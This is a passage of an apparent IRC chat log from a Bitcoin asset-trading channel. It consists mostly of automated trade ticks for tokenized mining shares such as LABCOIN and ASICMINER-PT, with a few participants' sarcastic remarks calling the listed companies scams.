12 21:43:59 [BTCTC] [BITVPS] 113 @ 0.002339 = 0.2643 BTC [+] Aug 12 21:44:00 [BTCTC] [BITVPS] 1 @ 0.002342 BTC [+] Aug 12 21:44:01 [BTCTC] [BITVPS] 100 @ 0.00235 = 0.235 BTC [+] Aug 12 21:44:02 [BTCTC] [BITVPS] 40 @ 0.00239 = 0.0956 BTC [+] Aug 12 21:44:03 [BTCTC] [BITVPS] 10 @ 0.0024 = 0.024 BTC [+] Aug 12 21:44:04 [BTCTC] [BITVPS] 60 @ 0.002499 = 0.1499 BTC [+] Aug 12 21:44:06 [BTCTC] [BITVPS] 24 @ 0.0025 = 0.06 BTC [+] Aug 12 21:44:07 [BTCTC] [BITVPS] 100 @ 0.0025 = 0.25 BTC [+] Aug 12 21:44:12 [BTCTC] [BITVPS] 10 @ 0.0025 = 0.025 BTC [+] Aug 12 21:44:12 [BTCTC] [ASICMINER-PT] 3 @ 4.176 = 12.528 BTC [+] Aug 12 21:44:13 [BTCTC] [LABCOIN] 20 @ 0.001899 = 0.038 BTC [-] Aug 12 21:44:14 [BTCTC] [BITVPS] 46 @ 0.002562 = 0.1179 BTC [+] Aug 12 21:44:16 [BTCTC] [LABCOIN] 955 @ 0.0019 = 1.8145 BTC [+] Aug 12 21:44:17 [BTCTC] [BITVPS] 54 @ 0.002674 = 0.1444 BTC [+] Aug 12 21:44:19 [BTCTC] [BITVPS] 25 @ 0.00279 = 0.0698 BTC [+] Aug 12 21:44:20 [BTCTC] [BITVPS] 30 @ 0.002795 = 0.0839 BTC [+] Aug 12 21:44:28 [BTCTC] [BITVPS] 112 @ 0.00289 = 0.3237 BTC [+] Aug 12 21:44:29 [BTCTC] [BITVPS] 80 @ 0.002901 = 0.2321 BTC [+] Aug 12 21:44:31 [BTCTC] [BITVPS] 1000 @ 0.002999 = 2.999 BTC [+] Aug 12 21:44:32 [BTCTC] [BITVPS] 1000 @ 0.003 = 3 BTC [+] Aug 12 21:44:32 [BTCTC] [BITVPS] 20 @ 0.003 = 0.06 BTC [+] Aug 12 21:45:13 [BTCTC] [ACTIVEMINING] 21 @ 0.005898 = 0.1239 BTC [-] Aug 12 21:45:14 [BTCTC] [LABCOIN] 534 @ 0.0019 = 1.0146 BTC [+] Aug 12 21:45:30 [BTCTC] [ASICMINER-PT] 2 @ 4.176 = 8.352 BTC [+] Aug 12 21:45:31 [BTCTC] [ASICMINER-PT] 2 @ 4.176 = 8.352 BTC [+] Aug 12 21:45:33 [BTCTC] [ASICMINER-PT] 1 @ 4.177 BTC [+] Aug 12 21:45:34 [BTCTC] [ASICMINER-PT] 7 @ 4.177 = 29.239 BTC [+] Aug 12 21:46:14 [BTCTC] [BITVPS] 85 @ 0.0033 = 0.2805 BTC [+] Aug 12 21:46:16 [BTCTC] [ACTIVEMINING] 10 @ 0.005898 = 0.059 BTC [-] Aug 12 21:46:16 [BTCTC] [BITVPS] 995 @ 0.0035 = 3.4825 BTC [+] Aug 12 21:46:27 [BTCTC] [TAT.ASICMINER] 17 @ 0.0428 = 0.7276 BTC [-] Aug 12 21:46:28 [BTCTC] [ACTIVEMINING] 10 @ 0.005898 = 0.059 BTC [-] Aug 12 21:46:29 [BTCTC] [ASICMINER-PT] 2 @ 4.177 = 8.354 BTC [+] Aug 12 21:46:58 [BTCTC] [LABCOIN] 350 @ 0.001899 = 0.6647 BTC [-] Aug 12 21:46:59 [BTCTC] [ASICMINER-PT] 3 @ 4.188 = 12.564 BTC [+] Aug 12 21:47:03 [BTCTC] [ASICMINER-PT] 10 @ 4.198 = 41.98 BTC [+] Aug 12 21:47:16 [BTCTC] [ACTIVEMINING] 13 @ 0.005898 = 0.0767 BTC [-] Aug 12 21:47:18 [BTCTC] [ACTIVEMINING] 10 @ 0.005899 = 0.059 BTC [+] Aug 12 21:47:20 [BTCTC] [ACTIVEMINING] 50 @ 0.0059 = 0.295 BTC [+] Aug 12 21:47:28 [BTCTC] [ASICMINER-PT] 1 @ 4.212 BTC [+] Aug 12 21:47:44 [BTCTC] [ASICMINER-PT] 1 @ 4.198 BTC [-] Aug 12 21:47:57 [BTCTC] [ACTIVEMINING] 55 @ 0.005901 = 0.3246 BTC [+] Aug 12 21:47:58 [BTCTC] [ACTIVEMINING] 50 @ 0.005902 = 0.2951 BTC [+] Aug 12 21:48:11 [BTCTC] [ASICMINER-PT] 1 @ 4.216 BTC [+] Aug 12 21:48:12 [BTCTC] [LABCOIN] 30 @ 0.001807 = 0.0542 BTC [-] Aug 12 21:48:13 [BTCTC] [LABCOIN] 3 @ 0.001806 = 0.0054 BTC [-] Aug 12 21:48:15 [BTCTC] [LABCOIN] 2 @ 0.001803 = 0.0036 BTC [-] Aug 12 21:48:16 [BTCTC] [LABCOIN] 20 @ 0.001802 = 0.036 BTC [-] Aug 12 21:48:17 [BTCTC] [LABCOIN] 16 @ 0.0018 = 0.0288 BTC [-] Aug 12 21:48:18 [BTCTC] [LABCOIN] 135 @ 0.001799 = 0.2429 BTC [-] Aug 12 21:48:20 [BTCTC] [LABCOIN] 1 @ 0.00175 BTC [-] Aug 12 21:48:43 [BTCTC] [ACTIVEMINING] 4 @ 0.005917 = 0.0237 BTC [+] Aug 12 21:48:45 [BTCTC] [ACTIVEMINING] 20 @ 0.005918 = 0.1184 BTC [+] Aug 12 21:48:46 [BTCTC] [ACTIVEMINING] 503 @ 0.005928 = 2.9818 BTC [+] Aug 12 21:49:17 [BTCTC] [LABCOIN] 30 @ 0.001706 = 0.0512 BTC [-] Aug 12 21:49:19 [BTCTC] [LABCOIN] 349 @ 0.001705 = 0.595 BTC [-] Aug 12 21:49:43 [BTCTC] [ACTIVEMINING] 1700 @ 0.005929 = 10.0793 BTC [+] Aug 12 21:49:59 [BTCTC] [ACTIVEMINING] 55 @ 0.005929 = 0.3261 BTC [+] Aug 12 21:50:10 [BTCTC] [ASICMINER-PT] 5 @ 4.24 = 21.2 BTC [+] Aug 12 21:50:27 [BTCTC] [LABCOIN] 40 @ 0.001637 = 0.0655 BTC [-] Aug 12 21:50:29 [BTCTC] [LABCOIN] 230 @ 0.001636 = 0.3763 BTC [-] Aug 12 21:50:35 [BTCTC] [DMS.MINING] 1 @ 0.00365 BTC [+] Aug 12 21:50:38 [BTCTC] [ASICMINER-PT] 5 @ 4.245 = 21.225 BTC [+] Aug 12 21:50:41 [BTCTC] [LABCOIN] 30 @ 0.001638 = 0.0491 BTC [+] Aug 12 21:50:43 [BTCTC] [LABCOIN] 90 @ 0.001636 = 0.1472 BTC [-] Aug 12 21:50:57 [BTCTC] [LABCOIN] 30 @ 0.001636 = 0.0491 BTC [-] Aug 12 21:50:58 [BTCTC] [ACTIVEMINING] 30 @ 0.005927 = 0.1778 BTC [-] Aug 12 21:50:59 [BTCTC] [ACTIVEMINING] 470 @ 0.005929 = 2.7866 BTC [+] Aug 12 21:51:00 [BTCTC] [LABCOIN] 210 @ 0.001636 = 0.3436 BTC [-] Aug 12 21:51:01 [BTCTC] [LABCOIN] 30 @ 0.001796 = 0.0539 BTC [+] Aug 12 21:51:10 [BTCTC] [LABCOIN] 21 @ 0.001797 = 0.0377 BTC [+] Aug 12 21:51:12 [BTCTC] [LABCOIN] 20 @ 0.001798 = 0.036 BTC [+] Aug 12 21:51:13 [BTCTC] [LABCOIN] 1719 @ 0.001799 = 3.0925 BTC [+] Aug 12 21:51:13 [BTCTC] [LABCOIN] 30 @ 0.001796 = 0.0539 BTC [-] Aug 12 21:51:28 [BTCTC] [LABCOIN] 470 @ 0.001796 = 0.8441 BTC [-] Aug 12 21:51:30 [HAVELOCK] [AM100] 4 @ 0.0366 = 0.1464 BTC [-] Aug 12 21:51:32 [HAVELOCK] [AM100] 6 @ 0.0365 = 0.219 BTC [-] Aug 12 21:51:46 [BTCTC] [ACTIVEMINING] 160 @ 0.005929 = 0.9486 BTC [+] Aug 12 21:52:00 [BTCTC] [ASICMINER-PT] 1 @ 4.245 BTC [+] Aug 12 21:52:02 [BTCTC] [ASICMINER-PT] 1 @ 4.245 BTC [+] Aug 12 21:52:04 [BTCTC] [ACTIVEMINING] 570 @ 0.005929 = 3.3795 BTC [+] Aug 12 21:52:05 [BTCTC] [ASICMINER-PT] 1 @ 4.247 BTC [+] Aug 12 21:52:07 [BTCTC] [ASICMINER-PT] 1 @ 4.25 BTC [+] Aug 12 21:52:08 [BTCTC] [DMS.MINING] 1 @ 0.003475 BTC [-] Aug 12 21:52:10 [BTCTC] [ASICMINER-PT] 6 @ 4.25 = 25.5 BTC [+] Aug 12 21:52:11 [BTCTC] [DMS.MINING] 13 @ 0.00345 = 0.0449 BTC [-] Aug 12 21:52:12 [BTCTC] [DMS.MINING] 125 @ 0.003421 = 0.4276 BTC [-] Aug 12 21:52:14 [BTCTC] [DMS.MINING] 500 @ 0.003414 = 1.707 BTC [-] Aug 12 21:52:33 [HAVELOCK] [AM100] 4 @ 0.0365 = 0.146 BTC [-] Aug 12 21:52:35 [HAVELOCK] [AM100] 6 @ 0.0364 = 0.2184 BTC [-] Aug 12 21:52:38 [BTCTC] [ACTIVEMINING] 10 @ 0.005929 = 0.0593 BTC [+] Aug 12 21:52:50 [BTCTC] [LABCOIN] 30 @ 0.001792 = 0.0538 BTC [-] Aug 12 21:52:51 [BTCTC] [ACTIVEMINING] 350 @ 0.005929 = 2.0752 BTC [+] Aug 12 21:53:01 [HAVELOCK] [AM100] 44 @ 0.0364 = 1.6016 BTC [-] Aug 12 21:53:03 [HAVELOCK] [AM100] 56 @ 0.0363001 = 2.0328 BTC [-] Aug 12 21:53:22 [BTCTC] [LABCOIN] 30 @ 0.001792 = 0.0538 BTC [-] Aug 12 21:53:33 [HAVELOCK] [AM100] 57 @ 0.0363001 = 2.0691 BTC [-] Aug 12 21:53:36 [HAVELOCK] [AM100] 43 @ 0.03620011 = 1.5566 BTC [-] Aug 12 21:53:40 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1999 BTC [-] Aug 12 21:53:49 [BTCTC] [LABCOIN] 300 @ 0.00175 = 0.525 BTC [-] Aug 12 21:53:52 [BTCTC] [LABCOIN] 100 @ 0.001646 = 0.1646 BTC [-] Aug 12 21:53:53 [BTCTC] [LABCOIN] 1400 @ 0.001639 = 2.2946 BTC [-] Aug 12 21:54:03 [HAVELOCK] [AM100] 53 @ 0.03620011 = 1.9186 BTC [-] Aug 12 21:54:05 [HAVELOCK] [AM100] 47 @ 0.0362001 = 1.7014 BTC [-] Aug 12 21:54:08 [BTCTC] [TAT.ASICMINER] 10 @ 0.04298 = 0.4298 BTC [+] Aug 12 21:54:10 [BTCTC] [TAT.ASICMINER] 25 @ 0.04299 = 1.0748 BTC [+] Aug 12 21:54:11 [BTCTC] [LABCOIN] 5 @ 0.001793 = 0.009 BTC [+] Aug 12 21:54:12 [BTCTC] [TAT.ASICMINER] 10 @ 0.04299 = 0.4299 BTC [+] Aug 12 21:54:14 [BTCTC] [DMS.MINING] 64 @ 0.00365 = 0.2336 BTC [+] Aug 12 21:54:15 [BTCTC] [TAT.ASICMINER] 133 @ 0.043 = 5.719 BTC [+] Aug 12 21:54:32 [BTCTC] [LABCOIN] 20 @ 0.001793 = 0.0359 BTC [+] Aug 12 21:55:06 [BTCTC] [TAT.ASICMINER] 5 @ 0.04051 = 0.2026 BTC [-] Aug 12 21:55:24 [BTCTC] [TAT.ASICMINER] 5 @ 0.04051 = 0.2026 BTC [-] Aug 12 21:56:15 [BTCTC] [LABCOIN] 44 @ 0.001668 = 0.0734 BTC [-] Aug 12 21:56:16 [BTCTC] [LABCOIN] 30 @ 0.001667 = 0.05 BTC [-] Aug 12 21:56:17 [BTCTC] [LABCOIN] 269 @ 0.001667 = 0.4484 BTC [-] Aug 12 21:56:18 [BTCTC] [LABCOIN] 60 @ 0.001666 = 0.1 BTC [-] Aug 12 21:56:19 [BTCTC] [LABCOIN] 12 @ 0.001656 = 0.0199 BTC [-] Aug 12 21:56:21 [BTCTC] [LABCOIN] 100 @ 0.001655 = 0.1655 BTC [-] Aug 12 21:56:22 [BTCTC] [LABCOIN] 2 @ 0.001651 = 0.0033 BTC [-] Aug 12 21:56:23 [BTCTC] [LABCOIN] 20 @ 0.00165 = 0.033 BTC [-] Aug 12 21:56:24 [BTCTC] [LABCOIN] 100 @ 0.001645 = 0.1645 BTC [-] Aug 12 21:56:25 [BTCTC] [LABCOIN] 185 @ 0.001645 = 0.3043 BTC [-] Aug 12 21:56:37 [BTCTC] [ASICMINER-PT] 4 @ 4.26 = 17.04 BTC [+] Aug 12 21:56:49 [BTCTC] [LABCOIN] 4 @ 0.00179 = 0.0072 BTC [+] Aug 12 21:56:59 [BTCTC] [ASICMINER-PT] 1 @ 4.291 BTC [+] Aug 12 21:57:23 [BTCTC] [LABCOIN] 30 @ 0.001661 = 0.0498 BTC [-] Aug 12 21:57:24 [BTCTC] [LABCOIN] 78 @ 0.00166 = 0.1295 BTC [-] Aug 12 21:57:26 [BTCTC] [LABCOIN] 500 @ 0.00165 = 0.825 BTC [-] Aug 12 21:57:27 [BTCTC] [LABCOIN] 20 @ 0.001647 = 0.0329 BTC [-] Aug 12 21:57:28 [BTCTC] [LABCOIN] 75 @ 0.001646 = 0.1235 BTC [-] Aug 12 21:57:29 [BTCTC] [LABCOIN] 315 @ 0.001645 = 0.5182 BTC [-] Aug 12 21:57:30 [BTCTC] [LABCOIN] 726 @ 0.001641 = 1.1914 BTC [-] Aug 12 21:57:31 [BTCTC] [LABCOIN] 100 @ 0.00164 = 0.164 BTC [-] Aug 12 21:57:33 [BTCTC] [LABCOIN] 1790 @ 0.00164 = 2.9356 BTC [-] Aug 12 21:57:44 [BTCTC] [DMS.MINING] 20 @ 0.003649 = 0.073 BTC [-] Aug 12 21:57:47 [BTCTC] [ASICMINER-PT] 30 @ 4.295 = 128.85 BTC [+] Aug 12 21:57:48 [BTCTC] [ACTIVEMINING] 390 @ 0.005929 = 2.3123 BTC [+] Aug 12 21:57:49 [BTCTC] [ACTIVEMINING] 625 @ 0.00593 = 3.7063 BTC [+] Aug 12 21:58:21 [BTCTC] [LABCOIN] 30 @ 0.001664 = 0.0499 BTC [+] Aug 12 21:58:23 [BTCTC] [LABCOIN] 10 @ 0.001663 = 0.0166 BTC [-] Aug 12 21:58:24 [BTCTC] [LABCOIN] 50 @ 0.001661 = 0.0831 BTC [-] Aug 12 21:58:25 [BTCTC] [LABCOIN] 100 @ 0.001643 = 0.1643 BTC [-] Aug 12 21:58:27 [BTCTC] [LABCOIN] 501 @ 0.001641 = 0.8221 BTC [-] Aug 12 21:58:28 [BTCTC] [LABCOIN] 3349 @ 0.00164 = 5.4924 BTC [-] Aug 12 21:58:29 [HAVELOCK] [XBOND] 100 @ 0.00104 = 0.104 BTC [-] Aug 12 21:58:33 [HAVELOCK] [AM100] 10 @ 0.0363 = 0.363 BTC [+] Aug 12 21:58:36 [HAVELOCK] [AM100] 12 @ 0.0362001 = 0.4344 BTC [-] Aug 12 21:58:38 [HAVELOCK] [AM100] 2 @ 0.0362 = 0.0724 BTC [-] Aug 12 21:58:40 [HAVELOCK] [AM100] 88 @ 0.03612 = 3.1786 BTC [-] Aug 12 21:58:42 [HAVELOCK] [AM100] 17 @ 0.03611 = 0.6139 BTC [-] Aug 12 21:58:45 [HAVELOCK] [AM100] 111 @ 0.0360001 = 3.996 BTC [-] Aug 12 21:59:02 [BTCTC] [LABCOIN] 30 @ 0.001642 = 0.0493 BTC [+] Aug 12 21:59:05 [BTCTC] [LABCOIN] 13 @ 0.001641 = 0.0213 BTC [-] Aug 12 21:59:06 [BTCTC] [LABCOIN] 7 @ 0.00164 = 0.0115 BTC [-] Aug 12 21:59:08 [BTCTC] [LABCOIN] 500 @ 0.00164 = 0.82 BTC [-] Aug 12 22:00:14 [BTCTC] [ASICMINER-PT] 1 @ 4.295 BTC [+] Aug 12 22:00:48 It's nice to see am back up Aug 12 22:00:55 [BTCTC] [LABCOIN] 30 @ 0.001703 = 0.0511 BTC [+] Aug 12 22:00:58 [BTCTC] [DMS.PURCHASE] 10 @ 0.02801 = 0.2801 BTC [-] Aug 12 22:01:48 [HAVELOCK] [XBOND] 1 @ 0.0010355 BTC [-] Aug 12 22:02:18 [BTCTC] [ASICMINER-PT] 6 @ 4.295 = 25.77 BTC [+] Aug 12 22:02:19 [BTCTC] [LABCOIN] 3 @ 0.001704 = 0.0051 BTC [+] Aug 12 22:02:23 [BTCTC] [LABCOIN] 25 @ 0.001703 = 0.0426 BTC [-] Aug 12 22:02:25 [BTCTC] [LABCOIN] 936 @ 0.0017 = 1.5912 BTC [-] Aug 12 22:02:48 [BTCTC] [LABCOIN] 30 @ 0.001705 = 0.0512 BTC [+] Aug 12 22:02:50 [BTCTC] [LABCOIN] 625 @ 0.001701 = 1.0631 BTC [-] Aug 12 22:02:51 [BTCTC] [LABCOIN] 4064 @ 0.0017 = 6.9088 BTC [-] Aug 12 22:02:51 [BTCTC] [LABCOIN] 30 @ 0.0017 = 0.051 BTC [-] Aug 12 22:03:05 [BTCTC] [LABCOIN] 30 @ 0.001699 = 0.051 BTC [-] Aug 12 22:03:28 [BTCTC] [ASICMINER-PT] 9 @ 4.296 = 38.664 BTC [+] Aug 12 22:03:31 [BTCTC] [LABCOIN] 30 @ 0.001699 = 0.051 BTC [-] Aug 12 22:03:32 [BTCTC] [ACTIVEMINING] 40 @ 0.005935 = 0.2374 BTC [+] Aug 12 22:03:34 [BTCTC] [LABCOIN] 904 @ 0.0017 = 1.5368 BTC [+] Aug 12 22:03:35 [BTCTC] [ACTIVEMINING] 30 @ 0.005937 = 0.1781 BTC [+] Aug 12 22:03:36 [BTCTC] [LABCOIN] 30 @ 0.001705 = 0.0512 BTC [+] Aug 12 22:03:37 [BTCTC] [ACTIVEMINING] 399 @ 0.005938 = 2.3693 BTC [+] Aug 12 22:03:38 [BTCTC] [LABCOIN] 40 @ 0.001767 = 0.0707 BTC [+] Aug 12 22:03:39 [BTCTC] [ACTIVEMINING] 81 @ 0.005958 = 0.4826 BTC [+] Aug 12 22:03:39 [BTCTC] [LABCOIN] 16 @ 0.001771 = 0.0283 BTC [+] Aug 12 22:03:40 [BTCTC] [LABCOIN] 9 @ 0.001776 = 0.016 BTC [+] Aug 12 22:03:41 [BTCTC] [LABCOIN] 77 @ 0.001777 = 0.1368 BTC [+] Aug 12 22:03:42 [BTCTC] [LABCOIN] 6 @ 0.001784 = 0.0107 BTC [+] Aug 12 22:03:44 [BTCTC] [LABCOIN] 50 @ 0.001785 = 0.0893 BTC [+] Aug 12 22:03:45 [BTCTC] [LABCOIN] 218 @ 0.001791 = 0.3904 BTC [+] Aug 12 22:03:46 [BTCTC] [LABCOIN] 1750 @ 0.001792 = 3.136 BTC [+] Aug 12 22:03:47 [BTCTC] [LABCOIN] 62 @ 0.001793 = 0.1112 BTC [+] Aug 12 22:03:48 [BTCTC] [LABCOIN] 500 @ 0.001794 = 0.897 BTC [+] Aug 12 22:03:49 [BTCTC] [LABCOIN] 35 @ 0.001798 = 0.0629 BTC [+] Aug 12 22:03:49 [BTCTC] [LABCOIN] 281 @ 0.001799 = 0.5055 BTC [+] Aug 12 22:03:50 [BTCTC] [LABCOIN] 16 @ 0.001844 = 0.0295 BTC [+] Aug 12 22:03:51 [BTCTC] [LABCOIN] 130 @ 0.001845 = 0.2399 BTC [+] Aug 12 22:03:52 [BTCTC] [LABCOIN] 25 @ 0.001884 = 0.0471 BTC [+] Aug 12 22:03:53 [BTCTC] [LABCOIN] 200 @ 0.001885 = 0.377 BTC [+] Aug 12 22:03:54 [BTCTC] [LABCOIN] 30 @ 0.001885 = 0.0566 BTC [+] Aug 12 22:03:55 [BTCTC] [LABCOIN] 591 @ 0.001885 = 1.114 BTC [+] Aug 12 22:04:29 [BTCTC] [LABCOIN] 20 @ 0.001697 = 0.0339 BTC [-] Aug 12 22:05:00 [HAVELOCK] [CFIG] 10 @ 0.15 = 1.5 BTC Aug 12 22:05:12 [BTCTC] [LABCOIN] 30 @ 0.001697 = 0.0509 BTC [-] Aug 12 22:05:34 [BTCTC] [LABCOIN] 20 @ 0.001698 = 0.034 BTC [+] Aug 12 22:05:54 Burnside even refunded the transaction fees, nice. Aug 12 22:06:25 [HAVELOCK] [XBOND] 150 @ 0.0010367 = 0.1555 BTC [+] Aug 12 22:06:45 [BTCTC] [TAT.ASICMINER] 5 @ 0.04296 = 0.2148 BTC [+] Aug 12 22:08:45 [HAVELOCK] [XBOND] 20 @ 0.0010462 = 0.0209 BTC [+] Aug 12 22:08:53 [BTCTC] [TAT.ASICMINER] 20 @ 0.04296 = 0.8592 BTC [+] Aug 12 22:08:56 [BTCTC] [LABCOIN] 30 @ 0.001653 = 0.0496 BTC [-] Aug 12 22:08:57 [BTCTC] [LABCOIN] 2 @ 0.001652 = 0.0033 BTC [-] Aug 12 22:08:59 [BTCTC] [LABCOIN] 20 @ 0.001651 = 0.033 BTC [-] Aug 12 22:09:00 [BTCTC] [LABCOIN] 100 @ 0.00165 = 0.165 BTC [-] Aug 12 22:09:08 [BTCTC] [LABCOIN] 3 @ 0.001791 = 0.0054 BTC [+] Aug 12 22:09:16 dodged that bullet e Aug 12 22:09:20 h Aug 12 22:09:32 [BTCTC] [LABCOIN] 30 @ 0.001648 = 0.0494 BTC [-] Aug 12 22:09:34 [BTCTC] [LABCOIN] 2 @ 0.001647 = 0.0033 BTC [-] Aug 12 22:09:34 [BTCTC] [LABCOIN] 20 @ 0.001646 = 0.0329 BTC [-] Aug 12 22:09:35 [BTCTC] [LABCOIN] 15 @ 0.001645 = 0.0247 BTC [-] Aug 12 22:09:36 [BTCTC] [LABCOIN] 20 @ 0.001644 = 0.0329 BTC [-] Aug 12 22:09:38 [BTCTC] [LABCOIN] 100 @ 0.001643 = 0.1643 BTC [-] Aug 12 22:09:39 [BTCTC] [LABCOIN] 19 @ 0.001641 = 0.0312 BTC [-] Aug 12 22:09:40 [BTCTC] [ASICMINER-PT] 8 @ 4.299 = 34.392 BTC [+] Aug 12 22:09:41 [BTCTC] [LABCOIN] 100 @ 0.001641 = 0.1641 BTC [-] Aug 12 22:09:42 [BTCTC] [LABCOIN] 154 @ 0.00164 = 0.2526 BTC [-] Aug 12 22:09:43 [BTCTC] [LABCOIN] 12 @ 0.001639 = 0.0197 BTC [-] Aug 12 22:09:45 [BTCTC] [LABCOIN] 100 @ 0.001638 = 0.1638 BTC [-] Aug 12 22:09:45 [BTCTC] [LABCOIN] 1 @ 0.001638 BTC [-] Aug 12 22:09:46 [BTCTC] [LABCOIN] 6 @ 0.001634 = 0.0098 BTC [-] Aug 12 22:10:20 [BTCTC] [LABCOIN] 20 @ 0.001636 = 0.0327 BTC [+] Aug 12 22:10:21 [BTCTC] [LABCOIN] 3 @ 0.001636 = 0.0049 BTC [+] Aug 12 22:10:23 [BTCTC] [LABCOIN] 30 @ 0.001635 = 0.0491 BTC [-] Aug 12 22:10:24 [BTCTC] [LABCOIN] 36 @ 0.001634 = 0.0588 BTC [-] Aug 12 22:10:25 [BTCTC] [LABCOIN] 289 @ 0.001633 = 0.4719 BTC [-] Aug 12 22:10:26 [BTCTC] [LABCOIN] 62 @ 0.001615 = 0.1001 BTC [-] Aug 12 22:10:27 [BTCTC] [LABCOIN] 500 @ 0.001614 = 0.807 BTC [-] Aug 12 22:10:29 [BTCTC] [LABCOIN] 64 @ 0.001613 = 0.1032 BTC [-] Aug 12 22:10:38 [BTCTC] [TAT.ASICMINER] 1 @ 0.04297 BTC [+] Aug 12 22:11:33 [BTCTC] [LABCOIN] 30 @ 0.001614 = 0.0484 BTC [+] Aug 12 22:11:35 [BTCTC] [LABCOIN] 59 @ 0.001613 = 0.0952 BTC [-] Aug 12 22:12:02 From .0016 to .0019, back down to .0016. Aug 12 22:12:37 [BTCTC] [ASICMINER-PT] 2 @ 4.299 = 8.598 BTC [+] Aug 12 22:13:06 and? Aug 12 22:13:08 [HAVELOCK] [AM100] 10 @ 0.036 = 0.36 BTC [-] Aug 12 22:13:11 [HAVELOCK] [AM100] 96 @ 0.0359 = 3.4464 BTC [-] Aug 12 22:13:31 [HAVELOCK] [AM1] 1 @ 3.99 BTC [+] Aug 12 22:13:46 [BTCTC] [ASICMINER-PT] 1 @ 4.299 BTC [+] Aug 12 22:14:11 [BTCTC] [LABCOIN] 30 @ 0.001617 = 0.0485 BTC [+] Aug 12 22:14:12 [BTCTC] [LABCOIN] 20 @ 0.001617 = 0.0323 BTC [+] Aug 12 22:14:14 [BTCTC] [LABCOIN] 80 @ 0.001616 = 0.1293 BTC [-] Aug 12 22:14:14 [BTCTC] [LABCOIN] 145 @ 0.001615 = 0.2342 BTC [-] Aug 12 22:14:15 [BTCTC] [LABCOIN] 20 @ 0.001613 = 0.0323 BTC [-] Aug 12 22:14:16 [BTCTC] [LABCOIN] 499 @ 0.001612 = 0.8044 BTC [-] Aug 12 22:14:17 [BTCTC] [LABCOIN] 256 @ 0.001612 = 0.4127 BTC [-] Aug 12 22:14:19 [BTCTC] [LABCOIN] 735 @ 0.001612 = 1.1848 BTC [-] Aug 12 22:14:32 [BTCTC] [ASICMINER-PT] 1 @ 4.2 BTC [-] Aug 12 22:14:34 [BTCTC] [ASICMINER-PT] 1 @ 4.189 BTC [-] Aug 12 22:14:35 [BTCTC] [ASICMINER-PT] 3 @ 4.188 = 12.564 BTC [-] Aug 12 22:14:42 [BTCTC] [TAT.ASICMINER] 20 @ 0.04296 = 0.8592 BTC [-] Aug 12 22:14:57 [BTCTC] [TAT.ASICMINER] 12 @ 0.04153 = 0.4984 BTC [-] Aug 12 22:14:59 [BTCTC] [TAT.ASICMINER] 10 @ 0.04152 = 0.4152 BTC [-] Aug 12 22:14:59 [BTCTC] [TAT.ASICMINER] 50 @ 0.04151 = 2.0755 BTC [-] Aug 12 22:15:00 [BTCTC] [TAT.ASICMINER] 3 @ 0.0415 = 0.1245 BTC [-] Aug 12 22:15:01 BREAKING: imaginary company gains and loses chump change, more at 11 Aug 12 22:15:10 [BTCTC] [LABCOIN] 1 @ 0.001736 BTC [+] Aug 12 22:15:14 [BTCTC] [LABCOIN] 30 @ 0.001619 = 0.0486 BTC [-] Aug 12 22:15:15 [BTCTC] [LABCOIN] 2 @ 0.001618 = 0.0032 BTC [-] Aug 12 22:15:16 [BTCTC] [LABCOIN] 28 @ 0.001617 = 0.0453 BTC [-] Aug 12 22:15:18 [BTCTC] [LABCOIN] 125 @ 0.001614 = 0.2018 BTC [-] Aug 12 22:15:19 [BTCTC] [LABCOIN] 265 @ 0.001612 = 0.4272 BTC [-] Aug 12 22:15:25 [HAVELOCK] [XBOND] 1 @ 0.00104 BTC [-] Aug 12 22:18:18 [BTCTC] [LABCOIN] 30 @ 0.001616 = 0.0485 BTC [+] Aug 12 22:18:20 [BTCTC] [LABCOIN] 20 @ 0.001615 = 0.0323 BTC [-] Aug 12 22:18:20 [BTCTC] [LABCOIN] 256 @ 0.001612 = 0.4127 BTC [-] Aug 12 22:18:22 [BTCTC] [LABCOIN] 50 @ 0.001611 = 0.0806 BTC [-] Aug 12 22:18:25 [BTCTC] [LABCOIN] 3 @ 0.001611 = 0.0048 BTC [-] Aug 12 22:19:09 500 preteen investors need an extra dose of ritalin this morning as the bullshit markets lead by "I'm a really real company not just a forum post LLC, Heavy Industries BBQ" rally and then crash again, on news of a half assed google spreedsheet with some made up numbers on it Aug 12 22:19:52 [BTCTC] [LABCOIN] 22 @ 0.001618 = 0.0356 BTC [+] Aug 12 22:19:58 hold the press kens just posted a 10 second youtube video..buy buy buy Aug 12 22:20:15 [BTCTC] [ACTIVEMINING] 2 @ 0.0058 = 0.0116 BTC [-] Aug 12 22:20:21 the Scam&Preteen 500 index fell 7.4% Aug 12 22:20:24 [HAVELOCK] [AM100] 4 @ 0.0384 = 0.1536 BTC [+] Aug 12 22:20:26 [HAVELOCK] [AM100] 10 @ 0.0385 = 0.385 BTC [+] Aug 12 22:20:29 [HAVELOCK] [AM100] 106 @ 0.0385999 = 4.0916 BTC [+] Aug 12 22:20:30 lol what? Aug 12 22:20:31 [HAVELOCK] [AM100] 100 @ 0.0387 = 3.87 BTC [+] Aug 12 22:20:33 [HAVELOCK] [AM100] 10 @ 0.0388 = 0.388 BTC [+] Aug 12 22:20:33 area man in bad suit poses next to photoshoped sign on building Aug 12 22:20:35 [HAVELOCK] [AM100] 3 @ 0.03889 = 0.1167 BTC [+] Aug 12 22:20:37 [HAVELOCK] [AM100] 5 @ 0.03889998 = 0.1945 BTC [+] Aug 12 22:20:38 [HAVELOCK] [AM100] 237 @ 0.039 = 9.243 BTC [+] Aug 12 22:20:40 [HAVELOCK] [AM100] 20 @ 0.039 = 0.78 BTC [+] Aug 12 22:20:42 [HAVELOCK] [AM100] 5 @ 0.039 = 0.195 BTC [+] Aug 12 22:20:45 lol Aug 12 22:20:49 [HAVELOCK] [AM100] 5 @ 0.039 = 0.195 BTC [+] Aug 12 22:20:51 [HAVELOCK] [AM100] 1 @ 0.0398 BTC [+] Aug 12 22:21:01 [HAVELOCK] [XBOND] 340 @ 0.0010369 = 0.3525 BTC [-] Aug 12 22:21:11 [HAVELOCK] [XBOND] 5 @ 0.0010369 = 0.0052 BTC [-] Aug 12 22:21:20 [HAVELOCK] [XBOND] 1 @ 0.0010369 BTC [-] Aug 12 22:21:23 where is the video? Aug 12 22:21:52 [BTCTC] [ACTIVEMINING] 9 @ 0.0058 = 0.0522 BTC [-] Aug 12 22:22:14 gecko_x2 the who ? Aug 12 22:22:24 dub the what ? Aug 12 22:22:28 i feel old nao. Aug 12 22:23:13 Pretty sure he's referring to ActiveMining Aug 12 22:23:38 o o the angry old guy Aug 12 22:23:42 such a chop invite. Aug 12 22:24:14 http://www.youtube.com/watch?v=k-T1xt75jBs&feature=youtu.be Aug 12 